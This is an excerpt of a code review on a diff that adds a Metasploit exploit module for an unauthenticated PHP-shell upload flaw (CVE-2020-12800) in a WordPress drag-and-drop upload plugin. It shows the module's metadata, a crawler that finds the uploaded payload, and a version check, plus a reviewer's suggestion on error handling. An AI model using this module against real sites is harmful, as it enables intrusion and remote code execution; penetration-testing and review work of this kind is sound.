modules/exploits/multi/http/wp_dnd_mul_file_rce.rb

```diff
@@ -0,0 +1,161 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::Remote::HTTP::Wordpress
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Wordpress Drag and Drop Multi File Uploader RCE',
+        'Description' => %q{
+          This module exploits a file upload feature of Drag and Drop Multi File
+          Upload - Contact Form 7.  However, the allowed file extension list can
+          be bypassed by appending a %, allowing for php shells to be uploaded.
+          No authentication is required for exploitation.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'h00die', # msf module
+            'Austin Martin <amartin@amartinsec.com>' # original PoC, discovery
+          ],
+        'References' =>
+          [
+            [ 'EDB', '48520' ],
+            [ 'CVE', '2020-12800' ],
+            [ 'URL', 'https://github.com/amartinsec/CVE-2020-12800']
+          ],
+        'Platform' => ['php'],
+        'Privileged' => false,
+        'Arch' => ARCH_PHP,
+        'Targets' =>
+          [
+            [ 'Automatic Target', {}]
+          ],
+        'DisclosureDate' => 'May 11 2020',
+        'DefaultTarget' => 0
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('TARGETURI', [ true, 'The URI of Wordpress', '/'])
+      ], self.class
+    )
+  end
+
+  # recursively search uploads folder(s) to find our payload
+  def find_payload(path, payload_name)
+    unless @payload_location.nil?
+      return
+    end
+
+    path = normalize_uri(target_uri.path, path)
+    print_status("Checking #{path}")
+    res = send_request_cgi(
+      'uri' => path
+    )
+    if res.body.include? payload_name
+      print_good("Found payload: #{path}#{payload_name}")
+      @payload_location = "#{path}#{payload_name}"
+      return
+    end
+
+    # /a href="([\w\-\/]+)"/.match(res.body) do |url|
+    res.body.scan(%r{a href="([\w\-/]+)"}) do |url|
+      if url[0].start_with? '/'
+        # skip it, its the parent directory
+      elsif url[0].end_with? '/'
+        find_payload("#{path}#{url[0]}", payload_name)
+      end
+    end
+  end
+
+  def check
+    begin
+      return check_plugin_version_from_readme('drag-and-drop-multiple-file-upload-contact-form-7', '1.3.4', '1')
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, 'Could not connect to the web service')
+    end
+    Exploit::CheckCode::Safe
+  end
```

Comment:
`fail_with` usually isn't permitted in a `check` method.

```suggestion
  def check
    begin
      return check_plugin_version_from_readme('drag-and-drop-multiple-file-upload-contact-form-7', '1.3.4', '1')
    rescue ::Rex::ConnectionError
      vprint_error('Connection failed')
      return CheckCode::Unknown
    end
    CheckCode::Safe
  end
```